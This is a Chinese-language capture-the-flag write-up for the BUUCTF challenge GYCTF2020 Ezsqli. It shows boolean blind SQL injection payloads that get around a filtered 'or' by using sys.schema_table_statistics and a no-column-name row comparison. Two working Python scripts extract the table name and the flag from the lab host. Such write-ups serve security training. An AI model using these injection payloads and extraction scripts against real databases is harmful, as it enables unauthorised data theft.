[BUUCTF][GYCTF2020]Ezsqli
[GYCTF2020]Ezsqli
- 布尔盲注
- 无列名盲注
- 抓包,存在post的id参数。
- 进行测试
id=1时, :Nu1L
id=0时, :Error Occured When Fetch Result.
id=1’时, :bool(false)
id=1’#时,:bool(false)
- 语句不正确时返回bool(false)
- 所以猜测是数字型的注入
id=1^1 :Error Occured When Fetch Result.
id=1^0 :Nu1L
- 存在sql注入。
- fuzz一下。
![[BUUCTF][GYCTF2020]Ezsqli_第1张图片](http://img.e-com-net.com/image/info8/0094d085c8e948f8a2f33d242e63d093.jpg)
- 首先测试
0^(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))>{1})
但是看上方fuzz结果,可以看到or被过滤,所以information_schema数据库不能使用。
可以使用sys.schema_table_statistics获取
import requests
url="http://a843fe9f-7001-4fba-8cb5-007891301471.node3.buuoj.cn/index.php"
data={"id":""}
def name(num):
res=''
for i in range(1,50):
l=0
r=127
mid=(l+r)>>1
while(l<r):
pay1="0^(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics where table_schema=database()),{0},1))>{1})".format(i,mid)
data["id"]=pay1
if(num==1):
r1=requests.post(url,data=data)
# print(data)
# print(r1.text)
if("Nu1L" in r1.text):
l=mid+1
else:
r=mid
mid = (l+r)>>1
if(mid==0):
break
res+=chr(mid)
print(res)
def main():
name(1)
if __name__ == "__main__":
main()
得到表名:
4. 无列名注入
(1,1)>(select * from f1ag_1s_h3r3_hhhhh)
判断出出两列
0^((1,‘g’)>(select * from f1ag_1s_h3r3_hhhhh)) #正确
0^((1,‘f’)>(select * from f1ag_1s_h3r3_hhhhh)) #错误
0^((1,‘fm’)>(select * from f1ag_1s_h3r3_hhhhh)) #正确
0^((1,‘fl’)>(select * from f1ag_1s_h3r3_hhhhh)) #错误
多以可以通过比较读出flag
使用十六进制。
写上脚本。
import requests
def str_hex(s): #十六进制转换 fl ==> 0x666c
res = ''
for i in s:
res += hex(ord(i)).replace('0x','')
res = '0x' + res
return res
url = "http://a843fe9f-7001-4fba-8cb5-007891301471.node3.buuoj.cn/index.php"
s = ""
for i in range(50):
for j in range(33,127):
flag = s + chr(j)
payload = "1^((1,{0})>(select * from f1ag_1s_h3r3_hhhhh))^1".format(str_hex(flag))
# print(payload)
data = {
"id" : payload
}
r = requests.post(url, data=data)
if "Nu1L" in r.text:
s += chr(j-1)
print(s)
break